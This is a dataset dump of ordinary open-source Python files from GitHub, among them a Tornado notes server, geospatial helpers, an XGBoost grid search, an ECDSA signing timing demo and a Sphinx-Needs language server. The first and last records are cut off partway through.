'static'),\n}\n\napplication = tornado.web.Application([\n (r'/ws/echo', EchoHandler),\n (r'/ws/', IndexWebSocketsHandler),\n (r'/ws/note', NoteWebSocketHandler),\n\n (r'/api/note/(.+)', NoteAPIHandler),\n (r'/api/note/', NoteAPIHandler),\n (r'/api/note', NoteAPIHandler),\n (r'/api/notes', NotesAPIHandler),\n\n (r'/', IndexHandler)\n], **settings)\n\nif __name__ == \"__main__\":\n tornado.options.parse_command_line()\n\n logging.info(\"Starting Tornado web server on http://127.0.0.1:9090\")\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port=9090, address=\"127.0.0.1\")\n tornado.ioloop.IOLoop.instance().start()","repo_name":"tiagopais/NotesAround-Server","sub_path":"notes_wstornadoserver.py","file_name":"notes_wstornadoserver.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"27335834962","text":"def troca(copos, f):\n if f == 1:\n x = copos[0]\n copos[0] = copos[1]\n copos[1] = x\n\n elif f == 2:\n x = copos[1]\n copos[1] = copos[2]\n copos[2] = x\n\n else:\n x = copos[2]\n copos[2] = copos[0]\n copos[0] = x\n\n return copos\n\npos = [\"A\", \"B\", \"C\"]\ncopos = [0]*3\nx = int(input())\ncopos[pos.index(str(input()))] = 1\n\nfor i in range(x):\n copos = troca(copos, int(input()))\n\nprint(pos[copos.index(1)])\n","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/Jogo Dos Copos.py","file_name":"Jogo Dos Copos.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27395345835","text":"from pathlib import Path\nfrom typing import Union, List\nimport geopandas as gpd\nfrom geopandas import GeoDataFrame\nfrom shapely import Polygon\n\nfrom lidar_cmn.generic import check_path\n\n\ndef read_vector(\n data_path: Union[str, Path],\n layer_name: str = None,\n bbox: str = None,\n mask: str = None,\n rows: str = None,\n) -> GeoDataFrame:\n \"\"\"Read vector data and return a GeoDataFrame.\n\n Args:\n data_path: Union[str, Path]\n layer_name: str = None\n bbox: str = None\n mask: str = None\n rows: str = None\n \n Returns:\n GeoDataFrame\n \"\"\"\n # Read path\n path = check_path(path=data_path)\n\n # Read vector\n geodata = gpd.read_file(\n filename=path,\n engine=\"pyogrio\",\n fid_as_index=True,\n layer=layer_name,\n bbox=bbox,\n mask=mask,\n rows=rows\n )\n\n return geodata\n\n\ndef polygon_bbox(coordinates_list: List) -> Polygon:\n \"\"\"Make polygon bbox from list of coordinates.\n\n Args:\n coordinates_list: list\n\n Returns:\n Polygon\n \"\"\"\n if len(coordinates_list) == 4:\n return Polygon(\n [\n (coordinates_list[0], coordinates_list[3]),\n (coordinates_list[2], coordinates_list[3]),\n (coordinates_list[2], coordinates_list[1]),\n (coordinates_list[0], coordinates_list[1]),\n (coordinates_list[0], coordinates_list[3]),\n ]\n )\n else:\n raise Exception(f'The list must contain 4 objects. Your list has {len(coordinates_list)} objects.')\n\n\ndef target_area(\n boundaries: GeoDataFrame,\n link_source: GeoDataFrame,\n target: str = None\n) -> GeoDataFrame:\n \"\"\"Select target area data.\n\n Args:\n boundaries: GeoDataFrame\n link_source: GeoDataFrame\n target: str\n\n Returns:\n GeoDataFrame\n \"\"\"\n # Get target area\n if target is not None:\n focus_area = boundaries[boundaries[\"COMUNE\"] == target]\n else:\n focus_area = boundaries.dissolve()\n\n # Get bbox of target area\n bbox_coordinates = focus_area.geometry.bounds.iloc[0].tolist()\n\n # Make bbox\n bbox_shapely = polygon_bbox(coordinates_list=bbox_coordinates)\n bbox = gpd.GeoDataFrame(geometry=gpd.GeoSeries(bbox_shapely), crs=boundaries.crs)\n\n # Select target area data\n select_data = gpd.overlay(\n df1=bbox,\n df2=link_source,\n how=\"intersection\"\n )\n\n return select_data\n\n\n","repo_name":"MaxDragonheart/lidar_cmn","sub_path":"lidar_cmn/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71664877587","text":"from sethelper import *\nfrom itertools import permutations, product\nimport math\n\nfolder = 's3wreathc2'\n\nsep = 400 # between centers of triangles\nt_rad = 160 # radius of each triangle\nwidth = 10 # dot outlines\ndot_rad = 70\nspinner_width = 15\n\ndot_colors = [[(255,0,0), (245,245,0), (0,144,255)], [(240,150,0), (0,180,0), (150,0,255)]]\nspinner_colors = [(0,0,0), (150,150,150)]\n\npolar = lambda p,r,t: (p[0]+math.cos(t/180*math.pi)*r, p[1]+math.sin(t/180*math.pi)*r)\nbounding_box = lambda p,r: [p[0]-r, p[1]-r, p[0]+r, p[1]+r]\n\n\ndef spinner(draw, p, r, theta, sign, width, color):\n\tfor i in range(3):\n\t\tt = theta+120*i\n\t\t# draw.ellipse(bounding_box(p,20), (0,0,255))\n\t\tdraw.arc(bounding_box(polar(p,r/2,t), r/2+width/2), *[t,t-180][::(-1)**sign], color, width)\n\n\nfor orders in product(permutations(range(3)), repeat=2): # orders[i] is the permutation of the ith triangle\n\tfor swap in range(2): # says whether triangles are swapped\n\t\timg, draw = blankcard()\n\t\tdraw_orienter(draw)\n\n\t\tfor t in range(2): # position we're drawing a triangle\n\t\t\tT = t^swap # which triangle we're drawing\n\t\t\tp = (cardwidth/2, cardheight/2+sep/2*(-1)**t) # center of triangle\n\n\t\t\t# draw spinner\n\t\t\tsign = sum(orders[T][i]>orders[T][j] for i in range(3) for j in range(i,3))%2\n\t\t\tspinner(draw, p, t_rad, 90+60*t+(-1)**sign*25, sign, spinner_width, spinner_colors[T])\n\n\t\t\t# draw dots\n\t\t\tfor i in range(3):\n\t\t\t\tdraw.ellipse(bounding_box(polar(p, t_rad, 90+60*t+120*i), dot_rad), dot_colors[T][orders[T][i]], (spinner_colors[T]), width)\n\n\n\n\n\t\timg.save(f'{folder}/fronts/{orders}{swap}.png')\n\nsetback('S3CT', (209,152,249)).save(f'{folder}/back.png')","repo_name":"redstonerodent/set-variants","sub_path":"s3wreathc2.py","file_name":"s3wreathc2.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"40465951002","text":"\"\"\"Add test related fixtures here e.g. a fixture that will pre-create a resource needed for the tests.\"\"\"\nimport asyncio\nimport pathlib\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\n\nimport dict_tools\nimport pop\nimport pytest\nimport pytest_asyncio\n\n\n@pytest.fixture(scope=\"session\")\ndef code_dir() -> pathlib.Path:\n print(f\"code_dir:{pathlib.Path(__file__).parent.parent.absolute()}\")\n return pathlib.Path(__file__).parent.parent.absolute()\n\n\n@pytest.fixture(scope=\"module\")\ndef acct_data(ctx):\n \"\"\"\n acct_data that can be used in running simple yaml blocks\n \"\"\"\n yield {\"profiles\": {\"oci\": {\"default\": ctx.acct}}}\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef acct_profile() -> str:\n return \"TODO: Add profile name to use for test\"\n\n\n@pytest.fixture(scope=\"module\")\ndef event_loop():\n loop = asyncio.get_event_loop()\n yield loop\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef acct_subs():\n return [\"oci\"]\n\n\n@pytest.fixture(scope=\"module\", name=\"hub\")\ndef integration_hub(code_dir, event_loop):\n hub = pop.hub.Hub()\n hub.pop.loop.CURRENT_LOOP = event_loop\n hub.pop.sub.add(dyne_name=\"idem\")\n hub.pop.config.load(hub.idem.CONFIG_LOAD, \"idem\", parse_cli=False)\n hub.idem.RUNS = {\"test\": {}}\n\n yield hub\n\n\n@pytest_asyncio.fixture(scope=\"module\", name=\"ctx\")\nasync def integration_ctx(\n hub, acct_subs: List[str], acct_profile: str\n) -> Dict[str, Any]:\n ctx = dict_tools.data.NamespaceDict(\n run_name=\"test\",\n test=False,\n tag=\"fake_|-test_|-tag\",\n old_state={},\n )\n\n if not hub.OPT.acct.acct_file:\n raise ConnectionError(\"No ACCT_FILE in the environment\")\n if not hub.OPT.acct.acct_key:\n raise ConnectionError(\"No ACCT_KEY in the environment\")\n\n await hub.acct.init.unlock(hub.OPT.acct.acct_file, hub.OPT.acct.acct_key)\n ctx.acct = await hub.acct.init.gather(acct_subs, acct_profile)\n if not ctx.acct:\n raise Exception(\n f'Unable to load acct \"{acct_profile}\" from \"{hub.OPT.acct.acct_file}\"'\n )\n\n yield ctx\n\n\n@pytest.fixture(\n scope=\"function\",\n name=\"__test\",\n params=[0, 1, 2, 3],\n ids=[\"--test\", \"run\", \"no change --test\", \"no change\"],\n)\ndef test_flag(ctx, request):\n \"\"\"\n Functions that use the __test fixture will be run four times\n 0. With the --test flag set, to test what happens before creating a resource\n 1. Without the --test flag set, to create a resource\n 2. With the --test flag set, to verify that no changes would be made\n 3. Without the --test flag set, to verify that no changes are made\n \"\"\"\n ctx.test = bool((request.param + 1) % 2)\n yield request.param\n","repo_name":"35thelement/bromine-oci-idem","sub_path":"tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122398650","text":"#BST\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ndef lowestCommonAncestor(root, p, q):\n while root:\n # If both p and q are greater than parent\n if root.val < p.val and root.val < q.val:\n root = root.right\n # If both p and q are lesser than parent\n elif root.val > p.val and root.val > q.val:\n root = root.left\n else:\n return root.val\n return None\n#time O(h)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"0235n.py","file_name":"0235n.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"556454561","text":"import argumentos\nimport numpy as np\nimport salvar_resultados\nfrom data_stream_generators import get_dataset\n\nfrom adaptive_xgboost import AdaptiveXGBoostClassifier\nfrom adaptive_semiV2 import AdaptiveSemi\nfrom modelos_adaptados_para_sklearn import (\n AdaptiveRandomForestClassifierA,\n HoeffdingAdaptiveTreeClassifierA,\n AdaptiveSemiRegressorJr2,\n AdaptiveSemiRegressorJ2\n)\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import make_scorer, mean_squared_error, r2_score\n#define your own mse and set greater_is_better=False\nmse = make_scorer(mean_squared_error,greater_is_better=False)\n\ndef MSE(y_true,y_pred):\n mse = mean_squared_error(y_true, y_pred)\n print ('MSE: %2.3f' % mse)\n return mse\n\ndef R2(y_true,y_pred): \n r2 = r2_score(y_true, y_pred)\n print ('R2: %2.3f' % r2)\n return r2\n\ndef two_score(y_true,y_pred): \n MSE(y_true,y_pred) #set score here and not below if using MSE in GridCV\n score = R2(y_true,y_pred)\n return score\n\ndef two_scorer():\n return make_scorer(two_score, greater_is_better=False) # change for false if using MSE\n\n\ndef _criar_modelo(**kwargs):\n if argumentos.CLASSIFICADOR == \"axgb\":\n return AdaptiveXGBoostClassifier(**kwargs)\n elif argumentos.CLASSIFICADOR == \"axgb_reset\":\n return AdaptiveSemiRegressorJr2(detect_drift=True, unic=\"N\", **kwargs)\n elif argumentos.CLASSIFICADOR == \"axgb_sem_reset\":\n return AdaptiveSemiRegressorJ2(detect_drift=True, unic=\"N\", **kwargs)\n\n\nparameter_grid = {}\nparameter_grid = {\n \"max_depth\": [1, 5, 10, 15],\n \"learning_rate\": [0.01, 0.05, 0.1, 0.5],\n \"max_window_size\": [512, 1024, 2048, 4096, 8192],\n \"min_window_size\": [4, 8, 16],\n}\n\nparameter_grid_drifts = {\n \"adwin_delta\": [1, 0.002, 0.003, 0.00001, 0.0001],\n \"kswin_alpha\": [1, 0.005, 0.003, 0.00001, 0.0001],\n \"kswin_window_size\": [100, 500],\n \"kswin_stat_size\": [30, 100],\n \"ddm_min_num_instances\": [30, 50],\n \"ddm_warning_level\": [1, 2],\n \"ddm_out_control_level\": [3, 5]\n}\n\nprint(f\"Carregando dataset {argumentos.DATASET}\")\ndataset = np.loadtxt(f\"datasets/{argumentos.DATASET}.csv\", delimiter=\",\", skiprows=1)\nprint(f\"Configurando dataset\")\n\nprint(dataset)\nX, y = (\n dataset[: argumentos.MAX_REGISTROS, :-1],\n dataset[: argumentos.MAX_REGISTROS, -1],\n)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, train_size=0.3, random_state=1\n)\n\nprint(X_train, X_test,y_train, y_test)\ngs_cv = GridSearchCV(_criar_modelo(), parameter_grid_drifts, scoring=two_scorer(), n_jobs=2)\n\nprint(f\"Realizando GridSearchCV\")\nresult = gs_cv.fit(X_train, y_train)\n\n# summarize result\nprint('Best Score: %s' % result.best_score_)\nprint('Best Hyperparameters: %s' % result.best_params_)\n\nprint(\"Salvando resultados\")\nsalvar_resultados.salvar_resultados_gridsearch(gs_cv.cv_results_, gs_cv.best_params_)\n","repo_name":"fernandamsouza/Adaptive-Fast-XGBoost-for-Regression","sub_path":"GridSearch/tcc-validacao/grid_cv.py","file_name":"grid_cv.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42379587409","text":"#Verifica Aprovação\n\ndef verifica(valor):\n if valor == 10.0:\n return (\"Aprovado com Distinção\")\n elif valor >= 7.0:\n return (\"Aprovado\")\n else:\n return (\"Reprovado\")\n\n\ndef main ():\n\n nota1 = float (input(\"Digite a nota 1: \"))\n nota2 = float (input(\"Digite a nota 2: \"))\n\n media = (nota1 + nota2)/2\n \n print (f\"Com a média {media} o aluno está {verifica(media)}\")\n\n\nmain()","repo_name":"joaohfgarcia/python","sub_path":"uniesp_p2/exercicio_k.py","file_name":"exercicio_k.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40563355761","text":"# -------------------------------------------------\r\n# ECDSA Prime Field\r\n# 512 bits - SHA 512 \r\n# q = 512 bits\r\n# -------------------------------------------------\r\n\r\n# --- BIBLIOTECAS NECESARIAS --\r\n\r\n# -- ECDSA Prime Field 512 bits - SHA 512 \r\nfrom cryptography.hazmat.primitives import hashes\r\nfrom cryptography.hazmat.primitives.asymmetric import ec\r\nfrom cryptography.hazmat.primitives.asymmetric import utils\r\nfrom cryptography import exceptions\r\n\r\n# -- Medir tiempo\r\nimport time \r\n\r\n# ---- ALGORITMO -----\r\n\r\ndef ecdsa521(msg):\r\n\t# --- PARAMETROS --\r\n\r\n\t# -- Curva\r\n\r\n\tE = ec.SECP521R1() # Se crea una instancia de la curva eliptica sobre un campo primo \r\n\r\n\t# -- Par de llaves\r\n\r\n\t# Llave privada\r\n\tx = \"0FAD06DAA62BA3B25D2FB40133DA757205DE67F5BB0018FEE8C86E1B68C7E75CAA896EB32F1F47C70855836A6D16FCC1466F6D8FBEC67DB89EC0C08B0E996B83538\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tx = int(x,16)\r\n\r\n\t# Llave publica U = xG\r\n\r\n\t# Coordenada x\r\n\tUx = \"1894550D0785932E00EAA23B694F213F8C3121F86DC97A04E5A7167DB4E5BCD371123D46E45DB6B5D5370A7F20FB633155D38FFA16D2BD761DCAC474B9A2F5023A4\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tUx = int(Ux,16)\r\n\t# Coordenada y\r\n\tUy = \"0493101C962CD4D2FDDF782285E64584139C2F91B47F87FF82354D6630F746A28A0DB25741B5B34A828008B22ACC23F924FAAFBD4D33F81EA66956DFEAA2BFDFCF5\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tUy = int(Uy,16)\r\n\r\n\t# --- GENERACION DE LLAVES --\r\n\r\n\t# Llave publica\r\n\tpubECC = ec.EllipticCurvePublicNumbers(x=Ux, y=Uy, curve=E)\r\n\tpubKECC = pubECC.public_key()\r\n\r\n\t# Llave privada\r\n\tprivECC = ec.EllipticCurvePrivateNumbers(private_value=x, public_numbers=pubECC)\r\n\tprivKECC = privECC.private_key()\r\n\r\n\t# -- FIRMA --\r\n\tinicio = time.time()\r\n\tECC_sign = privKECC.sign(data=msg, signature_algorithm=ec.ECDSA(hashes.SHA512()))\r\n\tfin = time.time()\r\n\tr,s = utils.decode_dss_signature(ECC_sign)\r\n\tt_firma = fin - inicio\r\n\t#print(\"tiempo = %f\" % (t_firma))\r\n\t#print(\"r = {}\".format(hex(s)))\r\n\t#print(\"s = {}\".format(hex(r)))\r\n\r\n\t# -- VERIFICACION --\r\n\ttry:\r\n\t\tinicio = time.time()\r\n\t\tpubKECC.verify(signature=ECC_sign, data=msg, signature_algorithm=ec.ECDSA(hashes.SHA512()))\r\n\t\tfin = time.time()\r\n\t\tt_verificacion = fin - inicio\r\n\t\t#print(\"tiempo = %f\" % (t_verificacion))\r\n\t\treturn t_firma,t_verificacion \r\n\texcept(exceptions.InvalidSignature):\r\n\t\t#print(\"tiempo =-1\")\r\n\t\treturn t_firma,-1\r\n","repo_name":"antoniotorres0605/proyectoCriptografia","sub_path":"ECDSA_prime.py","file_name":"ECDSA_prime.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15204295503","text":"\"\"\"Wrangler for Microbe Directory results.\"\"\"\n\nfrom celery import chain\n\nfrom app.display_modules.display_wrangler import DisplayModuleWrangler\n\nfrom .constants import MODULE_NAME\nfrom .tasks import (\n microbe_directory_reducer,\n persist_result,\n collate_microbe_directory\n)\n\n\nclass MicrobeDirectoryWrangler(DisplayModuleWrangler):\n \"\"\"Tasks for generating virulence results.\"\"\"\n\n @classmethod\n def run_sample(cls, sample_id, sample):\n \"\"\"Gather single sample and process.\"\"\"\n samples = [sample]\n collate_task = collate_microbe_directory.s(samples)\n reducer_task = microbe_directory_reducer.s()\n analysis_result_uuid = sample['analysis_result']\n persist_task = persist_result.s(analysis_result_uuid, MODULE_NAME)\n\n task_chain = chain(collate_task, reducer_task, persist_task)\n result = task_chain.delay()\n\n return result\n\n @classmethod\n def run_sample_group(cls, sample_group, samples):\n \"\"\"Gather and process samples.\"\"\"\n collate_task = collate_microbe_directory.s(samples)\n reducer_task = microbe_directory_reducer.s()\n persist_task = persist_result.s(sample_group.analysis_result_uuid, MODULE_NAME)\n\n task_chain = chain(collate_task, reducer_task, persist_task)\n result = task_chain.delay()\n\n return result\n","repo_name":"MetaGenScope/metagenscope-server","sub_path":"app/display_modules/microbe_directory/wrangler.py","file_name":"wrangler.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5181239830","text":"from datetime import datetime, timedelta\nimport random, os, logging\n\nlogger = logging.getLogger(__name__)\n\ndef make_trigger_datetime(max_min=10, max_sec=59, max_id=3):\n \"\"\" Make datetime for trigger\n\n Arguments :\n max_min: random maximum number of minutes\n max_sec: random maximum number of seconds\n max_id: random maximum number of modules\n Returns :\n trigger_filename: trigger filename\n False: exception\n\n \"\"\"\n try:\n # formatter datetime\n fmt = '%Y%m%d%H%M%S'\n # offset\n min_delta = random.randint(0,max_min)\n sec_delta = random.randint(0,max_sec)\n mod_id = random.randint(0,max_id)\n\n #make datetime\n end_dt = datetime.now()\n stt_dt = end_dt - timedelta(minutes=min_delta) - timedelta(seconds=sec_delta)\n\n #combined string\n trigger_filename = str(mod_id).zfill(3) + '-' + stt_dt.strftime(fmt) + '-' + end_dt.strftime(fmt) + '.tgr'\n logger.info('Make trigger filename: ' + trigger_filename)\n \n return trigger_filename\n\n except:\n logger.error('Something error to making trigger filename')\n return False\n\n \ndef replicate_trigger(dir_path, tgr_filename):\n \"\"\" Replicate triggr file\n\n Arguments :\n dir_path: Path to directory for replication\n tgr_filename: trigger filename\n Returns :\n True or False\n \"\"\"\n try:\n # Make directory when nothing\n os.makedirs(dir_path, exist_ok=True)\n with open(os.path.join(dir_path, tgr_filename), 'w'):\n pass\n logger.info('Write trigger file: ' + os.path.join(dir_path, tgr_filename))\n return True\n\n except FileNotFoundError as err:\n logger.error('Write error: ' + err)\n return False\n\n except FileExistsError as err:\n logger.error('Write error: ' + err)\n return False","repo_name":"masa-ce/trigger_client","sub_path":"libs/mtime.py","file_name":"mtime.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23961294602","text":"# --------------------------------------------------------------------------\n# Licensed under the MIT license.\n# See License.txt in the project root for further license information.\n# --------------------------------------------------------------------------\n\n############################################################################\n# Based on pygls #\n# See ThirdPartyNotices.txt in the project root for additional notices. #\n############################################################################\n\nimport getpass\nimport os\nimport pathlib\nimport re\nfrom hashlib import blake2b\nfrom typing import List, Tuple\n\nfrom pygls.lsp.methods import (\n COMPLETION,\n COMPLETION_ITEM_RESOLVE,\n DEFINITION,\n HOVER,\n INITIALIZED,\n TEXT_DOCUMENT_DID_CHANGE,\n TEXT_DOCUMENT_DID_CLOSE,\n TEXT_DOCUMENT_DID_OPEN,\n WORKSPACE_DID_CHANGE_CONFIGURATION,\n)\nfrom pygls.server import LanguageServer\nfrom pygls.lsp.types import (\n CompletionItem,\n CompletionItemKind,\n CompletionList,\n CompletionOptions,\n CompletionParams,\n ConfigurationItem,\n ConfigurationParams,\n DidChangeTextDocumentParams,\n DidCloseTextDocumentParams,\n DidOpenTextDocumentParams,\n Hover,\n InitializeParams,\n InsertTextFormat,\n Location,\n MarkupContent,\n MarkupKind,\n MessageType,\n Position,\n Range,\n TextEdit,\n)\n\nfrom needls.needs_store import NeedsStore\n\n\nclass NeedsLanguageServer(LanguageServer):\n CMD_UPDATE_SETTINGS = \"needls.update_settings\"\n\n CONFIGURATION_SECTION = \"needls\"\n\n def __init__(self):\n super().__init__()\n\n self.needs_store = NeedsStore()\n\n\nneeds_server = NeedsLanguageServer()\n\n\ndef _validate(ls, params):\n text_doc = ls.workspace.get_document(params.text_document.uri)\n\n source = text_doc.source\n diagnostics = _validate_sphinx(source) if source else []\n\n ls.publish_diagnostics(text_doc.uri, diagnostics)\n\n\ndef _validate_sphinx(source):\n \"\"\"TODO: Validates sphinx reST file.\"\"\"\n diagnostics = []\n return diagnostics\n\n\ndef col_to_word_index(col: int, words: List[str]) -> int:\n \"\"\"Return the index of a word in a list of words for a given line character column.\"\"\"\n length = 0\n index = 0\n for word in words:\n length = length + len(word)\n if col <= length + index:\n return index\n index = index + 1\n return index - 1\n\n\ndef get_lines(ls, params) -> List[str]:\n \"\"\"Get all text lines in the current document.\"\"\"\n text_doc = ls.workspace.get_document(params.text_document.uri)\n source = text_doc.source\n return source.splitlines()\n\n\ndef get_word(ls, params) -> str:\n \"\"\"Return the word in a line of text at a character position.\"\"\"\n line_no, col = params.position\n lines = get_lines(ls, params)\n if line_no >= len(lines):\n return \"\"\n line = lines[line_no]\n words = line.split()\n index = col_to_word_index(col, words)\n return words[index]\n\n\ndef get_lines_and_word(ls, params) -> Tuple[List[str], str]:\n return (get_lines(ls, params), get_word(ls, params))\n\n\ndef get_need_type_and_id(ls, params) -> Tuple[str, str]:\n \"\"\"Return tupel (need_type, need_id) for a given document position.\"\"\"\n word = get_word(ls, params)\n for need in ls.needs_store.needs.values():\n if need[\"id\"] in word:\n return (need[\"type\"], need[\"id\"])\n return (None, None)\n\n\ndef doc_completion_items(ls, docs: List[str], doc_pattern: str) -> List[CompletionItem]:\n \"\"\"Return completion items for a given doc pattern.\"\"\"\n\n # calc all doc paths that start with the given pattern\n all_paths = [doc for doc in docs if doc.startswith(doc_pattern)]\n\n if len(all_paths) == 0:\n return\n\n # leave if there is just one path\n if len(all_paths) == 1:\n insert_text = all_paths[0][len(doc_pattern) :]\n return [\n CompletionItem(\n label=insert_text,\n insert_text=insert_text,\n kind=CompletionItemKind.File,\n detail=\"needs doc\",\n )\n ]\n\n # look at increasingly longer paths\n # stop if there are at least two options\n max_path_length = max(path.count(\"/\") for path in all_paths)\n current_path_length = doc_pattern.count(\"/\")\n\n if max_path_length == current_path_length == 0:\n sub_paths = all_paths\n return [\n CompletionItem(\n label=sub_path, kind=CompletionItemKind.File, detail=\"path to needs doc\"\n )\n for sub_path in sub_paths\n ]\n\n # create list that contains only paths up to current path length\n sub_paths = []\n for path in all_paths:\n if path.count(\"/\") >= current_path_length:\n new_path = \"/\".join(\n path.split(\"/\")[current_path_length : current_path_length + 1]\n )\n if new_path not in sub_paths:\n sub_paths.append(new_path)\n sub_paths.sort()\n\n items = []\n for sub_path in sub_paths:\n if sub_path.find(\".rst\") > -1:\n kind = CompletionItemKind.File\n else:\n kind = 19 # Folder\n items.append(\n CompletionItem(label=sub_path, kind=kind, detail=\"path to needs doc\")\n )\n return items\n\n\ndef complete_need_link(\n ls, params: CompletionParams, lines: List[str], line: str, word: str\n):\n # specify the need type, e.g.,\n # ->req\n if word.count(\">\") == 1:\n return CompletionList(\n is_incomplete=True,\n items=[\n CompletionItem(label=need_type, detail=\"need type\")\n for need_type in ls.needs_store.types\n ],\n )\n\n word_parts = word.split(\">\")\n\n # specify doc in which need is specified, e.g.,\n # ->req>fusion/index.rst\n if word.count(\">\") == 2:\n requested_type = word_parts[1] # e.g., req, test, ...\n if requested_type in ls.needs_store.types:\n return CompletionList(\n is_incomplete=True,\n items=doc_completion_items(\n ls, ls.needs_store.docs_per_type[requested_type], word_parts[2]\n ),\n )\n\n # specify the exact need, e.g.,\n # ->req>fusion/index.rst>REQ_001\n if word.count(\">\") == 3:\n requested_type = word_parts[1] # e.g., req, test, ...\n requested_doc = word_parts[2] # [0:-4] # without `.rst` file extension\n if requested_doc in ls.needs_store.needs_per_doc:\n substitution = word[word.find(\"->\") :]\n start_char = line.find(substitution)\n line_number = params.position.line\n return CompletionList(\n is_incomplete=False,\n items=[\n CompletionItem(\n label=need[\"id\"],\n insert_text=need[\"id\"],\n documentation=need[\"description\"],\n detail=need[\"title\"],\n additional_text_edits=[\n TextEdit(\n range=Range(\n start=Position(\n line=line_number, character=start_char\n ),\n end=Position(\n line=line_number,\n character=start_char + len(substitution),\n ),\n ),\n new_text=\"\",\n )\n ],\n )\n for need in ls.needs_store.needs_per_doc[requested_doc]\n if need[\"type\"] == requested_type\n ],\n )\n\n\ndef generate_hash(user_name, doc_uri, need_prefix, line_number):\n salt = os.urandom(blake2b.SALT_SIZE) # pylint: disable=no-member\n return blake2b(\n f\"{user_name}{doc_uri}{need_prefix}{line_number}\".encode(),\n digest_size=4,\n salt=salt,\n ).hexdigest()\n\n\ndef generate_need_id(\n ls, params, lines: List[str], word: str, need_type: str = None\n) -> str:\n \"\"\"Generate a need ID including hash suffix.\"\"\"\n\n user_name = getpass.getuser()\n doc_uri = params.text_document.uri\n line_number = params.position.line\n\n if not need_type:\n try:\n match = re.search(\".. ([a-z]+)::\", lines[line_number - 1])\n need_type = match.group(1)\n except AttributeError:\n return \"ID\"\n\n need_prefix = need_type.upper()\n hash_part = generate_hash(user_name, doc_uri, need_prefix, line_number)\n need_id = need_prefix + \"_\" + hash_part\n # re-generate hash if ID is already in use\n while need_id in ls.needs_store.needs:\n hash_part = generate_hash(user_name, doc_uri, need_prefix, line_number)\n need_id = need_prefix + \"_\" + hash_part\n return need_id\n\n\ndef complete_directive(ls, params, lines: List[str], word: str):\n # need_type ~ req, work, act, ...\n items = []\n for need_type, title in ls.needs_store.declared_types.items():\n text = (\n \" \" + need_type + \":: ${1:title}\\n\"\n \"\\t:id: ${2:\"\n + generate_need_id(ls, params, lines, word, need_type=need_type)\n + \"}\\n\"\n \"\\t:status: open\\n\\n\"\n \"\\t${3:content}.\\n$0\"\n )\n label = f\".. {need_type}::\"\n items.append(\n CompletionItem(\n label=label,\n detail=title,\n insert_text=text,\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n )\n )\n return CompletionList(is_incomplete=False, items=items)\n\n\ndef complete_role_or_option(ls, params, lines: List[str], word: str):\n return CompletionList(\n is_incomplete=False,\n items=[\n CompletionItem(\n label=\":id:\",\n detail=\"needs option\",\n insert_text=\"id: ${1:\"\n + generate_need_id(ls, params, lines, word)\n + \"}\\n$0\",\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n ),\n CompletionItem(\n label=\":need:\",\n detail=\"need role\",\n insert_text=\"need:`${1:ID}` $0\",\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n ),\n ],\n )\n\n\n@needs_server.feature(\n COMPLETION, CompletionOptions(trigger_characters=[\">\", \"/\", \":\", \".\"])\n)\ndef completions(ls, params: CompletionParams = None):\n \"\"\"Returns completion items.\"\"\"\n\n if not ls.needs_store.needs_initialized:\n return []\n\n lines, word = get_lines_and_word(ls, params)\n line_number = params.position.line\n if line_number >= len(lines):\n ls.show_message_log(\n f\"line {line_number} is empty, no completion trigger characters detected\"\n )\n return []\n line = lines[line_number]\n\n if word.startswith(\"->\") or word.startswith(\":need:`->\"):\n new_word = word.replace(\":need:`->\", \"->\")\n new_word = new_word.replace(\"`\", \"\") # in case need:`->...>...`\n return complete_need_link(ls, params, lines, line, new_word)\n\n if word.startswith(\":\"):\n return complete_role_or_option(ls, params, lines, word)\n\n if word.startswith(\"..\"):\n return complete_directive(ls, params, lines, word)\n\n return []\n\n\n@needs_server.feature(COMPLETION_ITEM_RESOLVE)\ndef completions_resolve(ls, item: CompletionItem):\n 